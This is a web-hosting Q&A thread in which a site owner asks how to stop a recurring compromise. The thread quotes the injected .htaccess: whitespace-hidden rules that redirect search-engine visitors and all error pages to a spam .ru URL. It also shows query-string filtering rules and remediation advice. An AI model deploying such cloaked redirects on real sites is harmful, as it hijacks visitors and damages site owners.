1

Possible Duplicate:
My server's been hacked EMERGENCY

There seems to be a malicious script accessing my server and editing the .htaccess files for all of my hosted sites to redirect towards spam links.

What is the best way to stop this from happening?

I have changed my server access details, both for the control panel and the FTP access and tried updating the existing .htaccess files with the following code but it still appears to be changing.

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>

# Protect the htaccess file
<files .htaccess>
order allow,deny
deny from all
</files>

# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

Is there anything else that would help?

Sorry for any lack of information, I'm fairly new to servers etc so if there is any extra details needed, just shout out!

Thanks in advance for any help.

Dan

******* EDIT *******

The malicious .htaccess as requested

<IfModule mod_rewrite.c>    
                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
                                                                                                RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
                                                                                    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
                                                                                                    RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
                                                </IfModule>

    # STRONG HTACCESS PROTECTION</code>
    <Files ~ "^.*\.([Hh][Tt][Aa])">
    order allow,deny
    deny from all
    satisfy all
    </Files>
    # protect from sql injection
    Options +FollowSymLinks
    RewriteEngine On
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
    RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
    RewriteRule ^(.*)$ index.php [F,L]                                                                                                                                                                                                                                          
                                                                                                                            ErrorDocument 400 http://byidelement.ru/ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 401 http://byidelement.ru/ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 403 http://byidelement.ru/ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 404 http://byidelement.ru/ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 500 http://byidelement.ru/ruby/index.php
Community
  • 1
DanC
  • 111
  • 4
  • 4
    Really, you should start by trying to determine how your server was breached, how much access the other person has, and how you can contain the damage. However, try to change the permissions on the .htaccess file - remove write permissions (`chmod -w .htaccess`), make it immutable `sudo chattr +i` (and, of course, ensure your webserver user can't `chmod`). You could even change the owner of the file - but it shouldn't be required. – cyberx86 Jan 08 '12 at 11:33
  • Thanks for the responses, I've changed the chmod to 0444 on all .htaccess files but have no real idea how to make it immutable or ensure my webserver cannot chmod! I'll have a fun Sunday figuring these out I'm sure! – DanC Jan 08 '12 at 11:51
  • Can you post the .htaccess file's it's creating? Often these infectionsare known and with a quick Google their cure can be found. Also, run [chkrootkit](http://www.chkrootkit.org/) on there a bit quick. – SimonJGreen Jan 08 '12 at 11:58

1 Answers1

2

Run chkrootkit on there a bit quick, just in case.

Make sure all the packages are up to date with security fixes:

  • Ubuntu/Debian: apt-get update; apt-get dist-upgrade
  • CentOS/Fedora/RHEL: yum upgrade

It's likely though that this is a known exploit in the version of Wordpress (or some other off-the-shelf framework) you're running and now it's being discovered it's remotely being exploited again and again. If this is the case search for the latest version of all frameworks you're running and check for security fixes.

Assuming it is been exploited remotely, this can be confirmed by getting a tail running on the web server access log(s) and watch for any suspicious activity. tail -f /var/log/apache2/access-log would be the command on a stock Ubuntu install, but all distro's place their Apache logs in different places. When you see something suspicious you'll know which VirtualHost has been compromised. If you're feeling adventurous, scan through your historic access logs as well. This can be daunting on a high traffic server but will show the point of attack. Narrow down your search by searching around the time when you know the first attack took place.

SimonJGreen
  • 3,195
  • 5
  • 30
  • 55